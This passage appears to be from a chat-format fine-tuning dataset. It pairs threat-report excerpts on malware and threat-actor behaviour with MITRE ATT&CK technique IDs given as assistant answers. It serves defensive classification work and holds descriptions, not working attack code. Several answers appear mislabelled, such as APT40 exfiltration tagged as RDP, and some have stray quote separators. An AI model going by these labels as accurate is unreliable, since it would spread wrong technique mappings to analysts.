- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cadelspy has the ability to record audio from the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet used WMI with an \"explorer.exe\" token to execute on a remote share."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang performs operating system information discovery using \"systeminfo\" and has used implants to identify the system language and computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used a SharePoint enumeration and data dumping tool known as spwebmember."
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can collect data and files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Establish persistence via the Startup folder or theRun registry key (some variants). 2) Inject itself to another process such as rundll32.exe and dllhost.exe (some variants). 3) Decrypt two blobs: Import Table and the loader configuration"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Duqu command and control protocol's data stream can be encrypted with AES-CBC."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RobbinHood stops 181 Windows services on the system before beginning the encryption process."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used batch scripting to automate execution of commands."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges. The service is configured with a name, description, and display name that is provided within the configuration"
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a keylogger to capture keystrokes and location of where the user is typing."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner can steal Google Chrome and Apple Safari browser cookies from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ IMJPMIJ8.1{3 characters of Unique Identifier}\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSInfo performs a connection test to discover remote systems in the network"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download additional encrypted backdoors onto the victim via GIF files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains an implementation of PsExec for remote execution."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Completing missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft"
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Evilnum has used malicious JavaScript files on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT has used DNS to communicate with the C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, the script executes a command to delete the targeted PC’s volume shadow copies, so victims cannot restore older unencrypted versions of their files"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos searches for Sandboxie and VMware on the system."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Transparent Tribe has compromised domains for use in targeted malicious campaigns."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used RDP to access targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most Sakula samples maintain persistence by setting the Registry Run key \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\" in the HKLM or HKCU hive, with the Registry value and file name varying by sample."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. DGet — This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. Source: Secureworks) - Screen Capture Tool— This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar — This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use downloaders or other malware to send the new list to a compromised host. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore’s plugins were obfuscated with Eazfuscater.NET 3.3."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "That persistence is achieved by adding a new task in the task scheduler – it deploys the malicious sample after every minute, to ensure that it keeps running"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Spark has been packed with Enigma Protector to obfuscate its contents."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These Honeybee documents did not contain any specific lures, rather variations of a “not compatible” message attempting to convince the user to enable content"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 leveraged privileged accounts to replicate directory service data with domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1003.006 - OS Credential Dumping: DCSync"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can recursively search for files in folders and collects files from the desktop with certain extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoxCaon has searched for files on the system, such as documents located in the desktop folder."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 7: Dropbox-themed landing page with a lure asking users to click a button that links to the malicious document"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has compressed data into password-protected RAR archives prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AutoIt backdoor has sent a C2 response that was base64-encoded."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taken together, the VirusTotal submissions of the samples, the samples themselves, the ZIP containing the samples (observed as a dissemination mechanism via email attachment), as well as the RAR container (seen later in this report under the Analysis section) form a timeline beginning on 12 November"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan’s capabilities. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HighShell v5.0 explorer tab allows actor to navigate the file system The HighShell v7.1 variant from the data dump contains similar functionality to its predecessors and continued the tabular approach but expanded even further by splitting out the main functionality across multiple tabs, specifically “Command”, “Explorer”, “Upload”, “Download”, “Sql Server” and “Change Time”"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"net user username \\password \\domain\" commands in Net can be used to create a domain account."
- },
- {
- "role": "assistant",
- "content": "T1136.002 - Create Account: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used HTTP GET requests for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Win32/Diskcoder.D has the ability to spread via SMB. First, it scans internal networks for open SMB shares. It looks for the following shares"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The software installed on the compromised computer is of particular interest. Which programs are installed on the system. Which of them are executed automatically at each system start or user logon. Which programs are used by a particular user. If the attackers are interested, they are only one command away from these valuable data"
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon uses TCP and UDP for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore has been spread through malicious advertisements on websites."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In Figure 4, the first DNS query to resolve is. . yFIOr645245444143544544.windows64x[.]com which acts as an initial beacon. The first five characters (yFIOr) are random and have no purpose other than generating random subdomains in order to avoid DNS caching. The next two characters (64) signify the Hex notation of the d request type, which is the request type for the initial beacon as noted in Table 3. The request type is followed by the system specific hostname hardcoded into the sample, which in this case is 5245444143544544 for ."
- },
- {
- "role": "assistant",
- "content": "T1583.002 - DNS Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware has used HTTP and IRC for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors mapped network drives using 'net use' and administrator credentials."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hello, I got kinsing on my main development box (ubuntu 20 lamp stack). NO docker NO redis NO phpunit How it got in, is a mystery. All I can tell is it came in via apache (kinsing was running as www-data and main kinsing executable in /tmp was owned by www-data). I am using Laravel 7.2.0 not sure are there any loop in the laravel"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT creates a Registry key at \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" to survive a system reboot."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel uses HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT malware was designed and used to insert SUNBURST into software builds of the SolarWinds Orion IT management product."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has encrypted an ELF file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence attempts to get users to launch malicious attachments delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once an attacker has admin access to a Domain Controller, the KRBTGT account password hashes can be extracted using Mimikatz"
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POLONIUM has obtained and used tools such as AirVPN and plink in their operations."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the credential theft techniques identified by CrowdStrike was the use of a PowerShell script to execute Mimikatz in-memory. While in-memory Mimikatz is not particularly unique, the script executed by the threat actor was heavily obfuscated and encrypted the output using AES256. CrowdStrike was able to reconstruct the PowerShell script from the PowerShell Operational event log as the script’s execution was logged automatically due to the use of specific keywords. CrowdStrike recommends that organizations upgrade PowerShell on their systems, as this functionality is only available with PowerShell version 5 and above"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TSCookie has the ability to discover drive information on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors — both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. The attacks have become more sophisticated, and have evolved to evade detection on a continual basis. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright"
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form (T1059.001: PowerShell"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The wiper module (SHA256: 391e7b90bf3f0bfeb2c2602cc65aa6be4dd1c01374b89c4a48425f2d22fe231c) that the dropper writes to the system is responsible for overwriting the data within the MBR, partitions, and files on the system. The wiper carries out this wiping using a legitimate hard disk driver called RawDisk by ElDos. The wiper contains the ElDos RawDisk driver in a resource named 'e' that it extracts by skipping to offset 1984 and reading 27792 bytes from that offset. It then decrypts the data using aa 247-byte key and saves it to ‘%WINDOWS%\\system32\\hdv_725x.sys’. The wiper then creates a service named ‘hdv_725x’ for this driver using the following command line command and runs it with \"sc start hdv_725x"
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot can use a VBA macro embedded in an Excel file to drop the payload."
- },
- {
